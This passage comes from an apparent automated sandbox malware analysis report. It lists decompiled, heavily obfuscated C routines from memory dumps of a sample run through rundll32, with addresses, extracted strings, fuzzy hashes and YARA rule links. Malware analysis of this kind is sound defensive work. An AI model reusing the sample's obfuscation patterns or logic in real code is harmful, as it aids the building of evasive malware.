						_t108 = E0043DFD8(_v532,  &_v520, __eflags, _v544, _v536);
						_t131 =  &(_t131[3]);
						_t113 = 0x26f0d27d;
						continue;
					} else {
						if(_t113 == 0x2283ac23) {
							_t113 = 0x109d50bf;
							continue;
						} else {
							if(_t113 == 0x26f0d27d) {
								_v548 = 0x7bf9;
								_t116 = 0x44;
								_v548 = _v548 / _t116;
								_v548 = _v548 << 0xb;
								_v548 = _v548 ^ 0x000e9002;
								_t128 =  &_v520 + E0044232B(_v524,  &_v520, _v552) * 2;
								while(1) {
									_t108 =  &_v520;
									if(_t128 <= _t108) {
										break;
									}
									__eflags =  *_t128 - 0x5c;
									if( *_t128 != 0x5c) {
										L8:
										_t128 = _t128 - 2;
										__eflags = _t128;
										continue;
									} else {
										_t88 =  &_v548;
										 *_t88 = _v548 - 1;
										__eflags =  *_t88;
										if( *_t88 == 0) {
											__eflags = _t128;
										} else {
											goto L8;
										}
									}
									L12:
									_t113 = 0xb1bd1f2;
									goto L1;
								}
								goto L12;
							}
						}
					}
					L16:
					__eflags = _t113 - 0x20ed6828;
					if(__eflags != 0) {
						continue;
					}
					return _t108;
				}
				__eflags =  *0x451088 + 0x38;
				E004403F1(_v556, _v528, _t128,  *0x451088 + 0x38, _v540, _v560);
				_t131 =  &(_t131[4]);
				_t113 = 0x20ed6828;
				goto L16;
			}

0x00441f88
0x00441f8e
0x00441f98
0x00441fa0
0x00441fa5
0x00441faa
0x00441fb2
0x00441fba
0x00441fbf
0x00441fc7
0x00441fcf
0x00441fd7
0x00441fdc
0x00441fe4
0x00441fec
0x00441ff4
0x00441ffc
0x00442004
0x00442015
0x0044202a
0x00442030
0x0044203a
0x0044203e
0x00442046
0x0044204e
0x00442056
0x0044205e
0x00442063
0x0044206b
0x00442073
0x00442078
0x00442080
0x00442088
0x00442092
0x00442096
0x0044209a
0x004420a2
0x004420af
0x004420b3
0x004420b8
0x004420c0
0x00000000
0x004420c8
0x004420d2
0x00442147
0x00442158
0x0044215d
0x00442160
0x00000000
0x004420d4
0x004420da
0x00442143
0x00000000
0x004420dc
0x004420de
0x004420e4
0x004420f4
0x004420fb
0x004420ff
0x00442104
0x0044211e
0x00442132
0x00442132
0x00442138
0x00000000
0x00000000
0x00442123
0x00442127
0x0044212f
0x0044212f
0x0044212f
0x00000000
0x00442129
0x00442129
0x00442129
0x00442129
0x0044212d
0x0044213c
0x00000000
0x00000000
0x00000000
0x0044212d
0x0044213f
0x0044213f
0x00000000
0x0044213f
0x00000000
0x0044213a
0x004420de
0x004420da
0x0044218e
0x0044218e
0x00442194
0x00000000
0x00000000
0x004421a4
0x004421a4
0x00442178
0x00442181
0x00442186
0x00442189
0x00000000

Strings

=, xrefs: 00441FCF
(h , xrefs: 0044218E
J, xrefs: 00442046
(h , xrefs: 00442189
eK, xrefs: 0044209A

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (h $(h $=$eK$J
API String ID: 0-3161474748
Opcode ID: 0520491e9711218a03de1706a5af8e38cc018b3ec99840117411560715a9dd3b
Instruction ID: db299590cb1adfdb8aeaec22d3dbdf16f45f75f1bf740f291436d57427996104
Opcode Fuzzy Hash: 0520491e9711218a03de1706a5af8e38cc018b3ec99840117411560715a9dd3b
Instruction Fuzzy Hash: 705175B14083428BE718CF21C98541FBBE1FBD4748F904D1EF192962A0D3B88A4ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 001814FC, Relevance: 6.4, Strings: 5, Instructions: 123COMMON

Download Yara Rule

Strings

=, xrefs: 00181543
(h , xrefs: 00181702
(h , xrefs: 001816FD
eK, xrefs: 0018160E
J, xrefs: 001815BA

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (h $(h $=$eK$J
API String ID: 0-3161474748
Opcode ID: 86af4110603e91391cb94e6655895d576302203bbf1cfb34b4362cab8880e58e
Instruction ID: a40297c262727d212bd8d4c7ec76e3f550835674c1f1f35f61a359defacfb8a5
Opcode Fuzzy Hash: 86af4110603e91391cb94e6655895d576302203bbf1cfb34b4362cab8880e58e
Instruction Fuzzy Hash: 235166B25083429BD758DF25C88641FBBE5FBD4748F244D1EF496962A0D3B08A4ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 0043A2D2, Relevance: 6.4, Strings: 5, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 47%

			E0043A2D2() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t100;
				intOrPtr _t105;
				intOrPtr _t106;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t121;
				void* _t124;
				signed int* _t126;

				_t126 =  &_v36;
				_v32 = 0x28a4;
				_t110 = 0x7a;
				_v32 = _v32 / _t110;
				_v32 = _v32 + 0x1ce1;
				_t124 = 0x1fa14ba;
				_t111 = 0x6a;
				_v32 = _v32 * 0x39;
				_v32 = _v32 ^ 0x0006d499;
				_v36 = 0xda62;
				_v36 = _v36 | 0x19bfccda;
				_v36 = _v36 * 0x11;
				_v36 = _v36 + 0xffffda64;
				_v36 = _v36 ^ 0xb5bd9561;
				_v16 = 0xf5e2;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0xb4169af8;
				_v16 = _v16 ^ 0xb7c16fee;
				_v8 = 0x3ff4;
				_v8 = _v8 + 0xed72;
				_v8 = _v8 ^ 0x000177ac;
				_v20 = 0x623c;
				_v20 = _v20 * 0x56;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x0010aba0;
				_v4 = 0xa056;
				_v4 = _v4 + 0x9c16;
				_v4 = _v4 ^ 0x00012145;
				_v12 = 0xa565;
				_v12 = _v12 / _t111;
				_v12 = _v12 + 0xb62d;
				_v12 = _v12 ^ 0x0000fb40;
				_v24 = 0x4678;
				_v24 = _v24 + 0x5e74;
				_v24 = _v24 ^ 0x342f7ead;
				_v24 = _v24 | 0x89ec9c0a;
				_v24 = _v24 ^ 0xbdefbaa2;
				_v28 = 0x6d4f;
				_v28 = _v28 + 0xbb4f;
				_v28 = _v28 ^ 0x81aeaea9;
				_t100 = _v28;
				_t112 = 0x2b;
				_t121 = _t100 % _t112;
				_v28 = _t100 / _t112;
				_v28 = _v28 ^ 0x03044831;
				_t113 =  *0x451090;
				do {
					while(_t124 != 0x1fa14ba) {
						if(_t124 == 0x9354c13) {
							_push(_t113);
							_t105 = E0043A1FE(_t113, _t121, _v16, _t113, _v8, _v20);
							_t113 =  *0x451090;
							_t126 =  &(_t126[5]);
							_t124 = 0x2ac5a631;
							 *((intOrPtr*)(_t113 + 0x1c)) = _t105;
							continue;
						} else {
							if(_t124 != 0x2ac5a631) {
								goto L10;
							} else {
								_push(E00448C2B);
								_push(_v28);
								_push(_t113);
								_push(_v24);
								_push(_v12);
								_t106 = E0043903E(0, _v4);
								_t113 =  *0x451090;
								 *((intOrPtr*)(_t113 + 0x18)) = _t106;
							}
						}
						L5:
						return 0 | _t113 != 0x00000000;
					}
					_push(_t113);
					_t121 = 0x2c;
					_t113 = E004354FB(_t121);
					 *0x451090 = _t113;
					if(_t113 == 0) {
						_t124 = 0x380d3f8a;
						goto L10;
					} else {
						_t124 = 0x9354c13;
						continue;
					}
					goto L5;
					L10:
				} while (_t124 != 0x380d3f8a);
				goto L5;
			}

0x0043a2d2
0x0043a2d5
0x0043a2e9
0x0043a2ee
0x0043a2f4
0x0043a2fc
0x0043a30b
0x0043a318
0x0043a31c
0x0043a324
0x0043a32c
0x0043a339
0x0043a33d
0x0043a345
0x0043a34d
0x0043a355
0x0043a35a
0x0043a362
0x0043a36a
0x0043a372
0x0043a37a
0x0043a382
0x0043a38f
0x0043a393
0x0043a397
0x0043a39f
0x0043a3a7
0x0043a3af
0x0043a3b7
0x0043a3c7
0x0043a3cb
0x0043a3d3
0x0043a3db
0x0043a3e3
0x0043a3eb
0x0043a3f3
0x0043a3fb
0x0043a403
0x0043a40b
0x0043a413
0x0043a41b
0x0043a41f
0x0043a420
0x0043a422
0x0043a426
0x0043a42e
0x0043a434
0x0043a434
0x0043a43e
0x0043a483
0x0043a491
0x0043a496
0x0043a49c
0x0043a49f
0x0043a4a1
0x00000000
0x0043a440
0x0043a442
0x00000000
0x0043a448
0x0043a448
0x0043a450
0x0043a454
0x0043a455
0x0043a45b
0x0043a463
0x0043a468
0x0043a471
0x0043a471
0x0043a442
0x0043a475
0x0043a482
0x0043a482
0x0043a4ae
0x0043a4b1
0x0043a4b8
0x0043a4ba
0x0043a4c2
0x0043a4cb
0x00000000
0x0043a4c4
0x0043a4c4
0x00000000
0x0043a4c4
0x00000000
0x0043a4cd
0x0043a4cd
0x00000000

Strings

r, xrefs: 0043A372
t^, xrefs: 0043A3E3
<b, xrefs: 0043A382
Om, xrefs: 0043A403
obe_CM, xrefs: 0043A2FC, 0043A434

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <b$Om$obe_CM$r$t^
API String ID: 0-401240372
Opcode ID: e2b7d40611e55a19d341d3a8da4706383ce881e8e4f6ee4aa5e06c8f187b00b0
Instruction ID: 5ee9ede0911fa7f6c30b58a8b732e42d832867e01b148d6615bbcecd8af48068
Opcode Fuzzy Hash: e2b7d40611e55a19d341d3a8da4706383ce881e8e4f6ee4aa5e06c8f187b00b0
Instruction Fuzzy Hash: 5D51AA715093019FE308DF25D58A41BBBE1FBD8718F405A2EF489562A0D3B9CE598F8B

Uniqueness

Uniqueness Score: -1.00%

Function 00179846, Relevance: 6.4, Strings: 5, Instructions: 121COMMON

Download Yara Rule

Strings

t^, xrefs: 00179957
obe_CM, xrefs: 00179870, 001799A8
<b, xrefs: 001798F6
r, xrefs: 001798E6
Om, xrefs: 00179977

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <b$Om$obe_CM$r$t^
API String ID: 0-401240372
Opcode ID: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
Instruction ID: bc47bc4af817862ffc9c918ff0c2b1e3afed2493098893ab703be704fef808a6
Opcode Fuzzy Hash: ad4de06f0d9a924785fa1e6bc7105a8df5e5e7162f71bd7a00b5666e34d2a47b
Instruction Fuzzy Hash: C45147B15093019FE308DF25D58A81BBBE1FBD8718F504A1DF48A661A0D3B9CE498F87

Uniqueness

Uniqueness Score: -1.00%

Function 00448A33, Relevance: 6.4, Strings: 5, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00448A33(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _t116;
				signed int _t118;
				int _t123;
				void* _t126;
				signed int _t127;
				signed int _t129;
				signed int _t134;
				void* _t145;
				void* _t149;
				signed int _t151;

				_v48 = 0xf279;
				_v48 = _v48 | 0xff7f3bd7;
				_v48 = _v48 + 0xffffb664;
				_v48 = _v48 ^ 0xff7fb26b;
				_v52 = 0xdfc5;
				_v52 = _v52 | 0x672e76b1;
				_v52 = _v52 >> 6;
				_v52 = _v52 << 0xe;
				_v52 = _v52 ^ 0x2effc010;
				_v28 = 0x717b;
				_t149 = __ecx;
				_v28 = _v28 * 0x13;
				_t129 = 0x2b;
				_v28 = _v28 * 0x77;
				_v28 = _v28 ^ 0x03ea435f;
				_v16 = 0x5e90;
				_v16 = _v16 + 0x8fca;
				_v16 = _v16 ^ 0x0000ee4a;
				_v20 = 0x9c59;
				_v20 = _v20 ^ 0x54a83331;
				_v20 = _v20 ^ 0x54a8d08f;
				_v36 = 0x2be7;
				_v36 = _v36 | 0xf6bdff7f;
				_v36 = _v36 ^ 0xf6bda7e3;
				_v32 = 0x6479;
				_v32 = _v32 << 6;
				_v32 = _v32 * 0x13;
				_v32 = _v32 ^ 0x01dd2cd3;
				_v40 = 0x51fb;
				_v40 = _v40 + 0x7aab;
				_v40 = _v40 + 0xd6ea;
				_v40 = _v40 + 0xc8ce;
				_v40 = _v40 ^ 0x000230c3;
				_v8 = 0x432;
				_v8 = _v8 * 0x5a;
				_v8 = _v8 ^ 0x000148ae;
				_v24 = 0xb7c8;
				_v24 = _v24 * 0x18;
				_v24 = _v24 << 0xf;
				_v24 = _v24 ^ 0x9d6067a0;
				_v12 = 0x7924;
				_t59 =  &_v12; // 0x7924
				_v12 =  *_t59 / _t129;
				_v12 = _v12 ^ 0x0000718b;
				_v44 = 0x1703;
				_v44 = _v44 >> 9;
				_v44 = _v44 ^ 0x24440fa6;
				_v44 = _v44 << 2;
				_v44 = _v44 ^ 0x91103eb4;
				_v4 = E0043A156();
				_t126 = _v48 + E0043A156() % _v52;
				_t116 = E0043A156();
				_t118 = _v44;
				_t151 = _v28 + _t116 % _v16;
				if(_t118 < _t126) {
					_t127 = _t126 - _t118;
					_t145 = _t149;
					_t134 = _t127 >> 1;
					_t123 = memset(_t145, 0x2d002d, _t134 << 2);
					asm("adc ecx, ecx");
					_t149 = _t149 + _t127 * 2;
					memset(_t145 + _t134, _t123, 0);
				}
				E0044087B(_t149, _v40, _v8, _t151, _v24, 3,  &_v4, _v12);
				 *((short*)(_t149 + _t151 * 2)) = 0;
				return 0;
			}

0x00448a36
0x00448a40
0x00448a48
0x00448a50
0x00448a58
0x00448a5f
0x00448a66
0x00448a6a
0x00448a6e
0x00448a75
0x00448a85
0x00448a87
0x00448a92
0x00448a93
0x00448a97
0x00448a9f
0x00448aa7
0x00448aaf
0x00448ab7
0x00448abf
0x00448ac7
0x00448acf
0x00448ad7
0x00448adf
0x00448ae7
0x00448aef
0x00448af9
0x00448afd
0x00448b05
0x00448b0d
0x00448b15
0x00448b1d
0x00448b25
0x00448b2d
0x00448b3a
0x00448b3e
0x00448b46
0x00448b53
0x00448b57
0x00448b5c
0x00448b64
0x00448b6c
0x00448b72
0x00448b76
0x00448b7e
0x00448b86
0x00448b8b
0x00448b93
0x00448b98
0x00448ba9
0x00448bc6
0x00448bc8
0x00448bd9
0x00448bdd
0x00448be1
0x00448be3
0x00448bed
0x00448bef
0x00448bf1
0x00448bf3
0x00448bf5
0x00448bf8
0x00448bfb
0x00448c16
0x00448c20
0x00448c2a

Strings

$yJ, xrefs: 00448B6C
yd, xrefs: 00448AE7
J, xrefs: 00448AAF
+, xrefs: 00448ACF
{q, xrefs: 00448A75

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $yJ$J$yd${q$+
API String ID: 0-1056812311
Opcode ID: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
Instruction ID: 7bfb06c6405d948b19d0874f8a76282e17bc21e799b971a0da6d9d87fb2ecf7a
Opcode Fuzzy Hash: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
Instruction Fuzzy Hash: 5551F07050D341ABD348DF25D98941BFBE1BBC8708F50991DF0DA962A1C3B89A59CF8B

Uniqueness

Uniqueness Score: -1.00%

Function 00187FA7, Relevance: 6.4, Strings: 5, Instructions: 110COMMON

Download Yara Rule

Strings

{q, xrefs: 00187FE9
yd, xrefs: 0018805B
$yJ, xrefs: 001880E0
J, xrefs: 00188023
+, xrefs: 00188043

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $yJ$J$yd${q$+
API String ID: 0-1056812311
Opcode ID: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
Instruction ID: ea42af43d8e9589c8d728a55aa27de4ac082141474e05de2f70660c045c5d954
Opcode Fuzzy Hash: 3545f23447534342cf5752ecb078e1970462ca806c9444e73ab66d17d88e5b64
Instruction Fuzzy Hash: 2951F07050D341ABD348DF25D58941BFBE1FBD8B08F509A1DF0CA962A1C3B49A59CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0043FFBA, Relevance: 6.4, Strings: 5, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0043FFBA(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v588;
				void* _t119;
				signed int _t127;

				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v68 = 0x26646a;
				_v36 = 0x19d7;
				_v36 = _v36 ^ 0x575cc756;
				_v36 = _v36 ^ 0x575cd0df;
				_v12 = 0x27d2;
				_t127 = 0x61;
				_v12 = _v12 / _t127;
				_v12 = _v12 ^ 0x9e7a6cb1;
				_v12 = _v12 + 0x91e2;
				_v12 = _v12 ^ 0x9e7ab2a5;
				_v24 = 0x1208;
				_v24 = _v24 << 8;
				_v24 = _v24 + 0xff06;
				_v24 = _v24 ^ 0x00133f87;
				_v56 = 0x4c40;
				_v56 = _v56 + 0xffffbb62;
				_v56 = _v56 ^ 0x00002706;
				_v44 = 0x6bda;
				_v44 = _v44 | 0x742987e1;
				_v44 = _v44 ^ 0x7429f52a;
				_v28 = 0x57ee;
				_v28 = _v28 >> 1;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x00003c46;
				_v52 = 0x4743;
				_v52 = _v52 >> 0x10;
				_v52 = _v52 ^ 0x00003729;
				_v16 = 0xad1b;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 | 0xb72f12c0;
				_v16 = _v16 ^ 0xb72f244f;
				_v32 = 0x1354;
				_v32 = _v32 >> 0xe;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x00006891;
				_v20 = 0xf00c;
				_v20 = _v20 >> 0x10;
				_v20 = _v20 << 0xa;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x00003ff0;
				_v8 = 0xa5dc;
				_v8 = _v8 ^ 0x3adce6d7;
				_v8 = _v8 | 0x37424e68;
				_t83 =  &_v8; // 0x37424e68
				_v8 =  *_t83 * 0x24;
				_v8 = _v8 ^ 0xfb433705;
				_v48 = 0xf651;
				_v48 = _v48 << 0xf;
				_v48 = _v48 ^ 0x7b288bd6;
				_v40 = 0xf298;
				_v40 = _v40 * 0x22;
				_v40 = _v40 ^ 0x002053ff;
				_t119 = E0043BDCC( *0x451088 + 0x38, _v36, _v12, _v24);
				_t140 = _a4 + 0x2c;
				if(E00437F4B(_t119, _v56, _a4 + 0x2c, _v44, _v28) != 0) {
					E004335FC(_t140, _v52, _v16, _v32,  &_v588, _v20, _a8);
					E0043EB1E(_v8, _v48, _v40,  &_v588);
				}
				return 1;
			}

0x0043ffc3
0x0043ffc9
0x0043ffcd
0x0043ffd4
0x0043ffdb
0x0043ffe2
0x0043ffe9
0x0043fff6
0x0043fff9
0x0043fffc
0x00440003
0x0044000a
0x00440011
0x00440018
0x0044001c
0x00440023
0x0044002a
0x00440031
0x00440038
0x0044003f
0x00440046
0x0044004d
0x00440054
0x0044005b
0x0044005e
0x00440062
0x00440069
0x00440070
0x00440074
0x0044007b
0x00440082
0x00440086
0x0044008a
0x00440091
0x00440098
0x0044009f
0x004400a3
0x004400a7
0x004400ae
0x004400b5
0x004400b9
0x004400bd
0x004400c1
0x004400c8
0x004400cf
0x004400d6
0x004400dd
0x004400e1
0x004400e4
0x004400eb
0x004400f2
0x004400f6
0x004400fd
0x00440108
0x0044010b
0x00440124
0x00440137
0x00440145
0x0044015f
0x00440174
0x00440179
0x00440183

Strings

F<, xrefs: 00440062
@L, xrefs: 0044002A
hNB7, xrefs: 004400DD
)7, xrefs: 00440074
jd&, xrefs: 0043FFCD

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: )7$@L$F<$hNB7$jd&
API String ID: 1586166983-2568215416
Opcode ID: 7bafc6ef81f3856f3505f59e8b1d5134f5ee474f8f2a24d48295f8e4dafeb503
Instruction ID: 0b4f925816bef6ab06c7aae98fd7ea7970029d9783cb54b6614081d0a80d7967
Opcode Fuzzy Hash: 7bafc6ef81f3856f3505f59e8b1d5134f5ee474f8f2a24d48295f8e4dafeb503
Instruction Fuzzy Hash: 285110B1C0121EEBDF55DFE0D94A4EEBBB1FB08308F208199D511B62A1D7B90A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0017F52E, Relevance: 6.4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

Strings

hNB7, xrefs: 0017F651
)7, xrefs: 0017F5E8
jd&, xrefs: 0017F541
F<, xrefs: 0017F5D6
@L, xrefs: 0017F59E

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )7$@L$F<$hNB7$jd&
API String ID: 0-2568215416
Opcode ID: b4b52c6208338e16752ea4720bab2c9fa768a7bfbcf583c7884f87e0b6c5c6b7
Instruction ID: fd5771b079380d0de4057bf03dde707b6f73f4aa9b3aa249985ff2e88531d8f7
Opcode Fuzzy Hash: b4b52c6208338e16752ea4720bab2c9fa768a7bfbcf583c7884f87e0b6c5c6b7
Instruction Fuzzy Hash: EF512071D0021EEBDF44DFE0D94A4EEBBB1FB04308F208198D415B62A1D7B90A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0043F369, Relevance: 6.3, Strings: 5, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E0043F369(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t76;
				void* _t78;
				intOrPtr* _t79;
				signed int _t82;
				intOrPtr _t93;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x596980;
				_v16 = 0xc974;
				_t82 = 0xd;
				_t93 = _a4;
				_v16 = _v16 * 0x36;
				_v16 = _v16 ^ 0xaf6efdbb;
				_v16 = _v16 ^ 0xaf44ac5b;
				_v28 = 0x3fde;
				_v28 = _v28 + 0x4220;
				_v28 = _v28 ^ 0x00009a54;
				_v12 = 0x436a;
				_v12 = _v12 + 0x6671;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 ^ 0x000031a0;
				_v32 = 0x47a5;
				_v32 = _v32 + 0x143f;
				_v32 = _v32 ^ 0x0000673a;
				_v8 = 0x9f04;
				_v8 = _v8 >> 2;
				_v8 = _v8 + 0xffffba35;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x00009ed5;
				_v36 = 0x79e2;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000012a7;
				_v24 = 0x1d1a;
				_v24 = _v24 / _t82;
				_v24 = _v24 + 0xffff8b37;
				_v24 = _v24 ^ 0xfffff957;
				_v20 = 0x427c;
				_v20 = _v20 ^ 0xbd8b340b;
				_v20 = _v20 * 0x3e;
				_v20 = _v20 ^ 0xe7c6e2bc;
				_t76 =  *((intOrPtr*)(_t93 + 0x18))( *((intOrPtr*)(_t93 + 8)), 1, 0);
				_t99 = _t76;
				if(_t76 != 0) {
					_push(0x431050);
					_push(_v12);
					_t78 = E0044CF31(_v16, _v28, _t99);
					_push(_v8);
					_t95 = _t78;
					_push( *((intOrPtr*)(_t93 + 8)));
					_t79 = E00433938(_t78, _v32);
					if(_t79 != 0) {
						 *_t79();
					}
					E00440D6D(_v36, _v24, _v20, _t95);
				}
				return 0;
			}

0x0043f36f
0x0043f375
0x0043f37c
0x0043f38a
0x0043f38b
0x0043f38e
0x0043f391
0x0043f398
0x0043f39f
0x0043f3a6
0x0043f3ad
0x0043f3b4
0x0043f3bb
0x0043f3c2
0x0043f3c6
0x0043f3cd
0x0043f3d4
0x0043f3db
0x0043f3e2
0x0043f3e9
0x0043f3ed
0x0043f3f4
0x0043f3f8
0x0043f3ff
0x0043f406
0x0043f40a
0x0043f411
0x0043f41f
0x0043f422
0x0043f429
0x0043f430
0x0043f437
0x0043f444
0x0043f447
0x0043f451
0x0043f454
0x0043f456
0x0043f459
0x0043f45e
0x0043f467
0x0043f46c
0x0043f472
0x0043f474
0x0043f479
0x0043f483
0x0043f485
0x0043f485
0x0043f491
0x0043f498
0x0043f49f

Strings

|B, xrefs: 0043F430
y, xrefs: 0043F3FF
:g, xrefs: 0043F3DB
qf, xrefs: 0043F3BB
B, xrefs: 0043F3A6

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$:g$qf$|B$y
API String ID: 0-887352362
Opcode ID: 80673d08d8237db85359b4a1dfed1cfd9b37859fd98975d54ed3bf93830e0494
Instruction ID: 7602649af4e69fd119b92fdef9e9a2ab765cb2a3e3af1936bec4e9680713c03e
Opcode Fuzzy Hash: 80673d08d8237db85359b4a1dfed1cfd9b37859fd98975d54ed3bf93830e0494
Instruction Fuzzy Hash: 0A3113B1D0120AABEF04DFA1C94A5EEBBB1FF54318F208149D511B62A0D7B95B49CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0017E8DD, Relevance: 6.3, Strings: 5, Instructions: 79COMMON

Download Yara Rule

Strings

:g, xrefs: 0017E94F
|B, xrefs: 0017E9A4
qf, xrefs: 0017E92F
y, xrefs: 0017E973
B, xrefs: 0017E91A

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: B$:g$qf$|B$y
API String ID: 0-887352362
Opcode ID: 77dc1029f57f1d7a60eec0434573420ba6cd3ecc3b8d4ff41192ce59331574d0
Instruction ID: 65494cf024b2f8d889bbc230e3abb757fb6f3138857fa6f0b2daa7e370fb81be
Opcode Fuzzy Hash: 77dc1029f57f1d7a60eec0434573420ba6cd3ecc3b8d4ff41192ce59331574d0
Instruction Fuzzy Hash: 68311271D0120AABEF04DFA1C94A9EEFBB2FF54318F208249D510B62A0D7B95B45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0043D2DD, Relevance: 5.2, Strings: 4, Instructions: 197
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0043D2DD() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t206;
				void* _t210;
				void* _t217;
				intOrPtr _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int* _t244;

				_t244 =  &_v1144;
				_v1056 = 0x1aa15c;
				_v1052 = 0x4d0cb0;
				_t217 = 0xcdcbb46;
				_v1048 = 0xec305;
				_t238 = 0;
				_v1044 = 0;
				_v1080 = 0xf4ee;
				_t239 = 0x37;
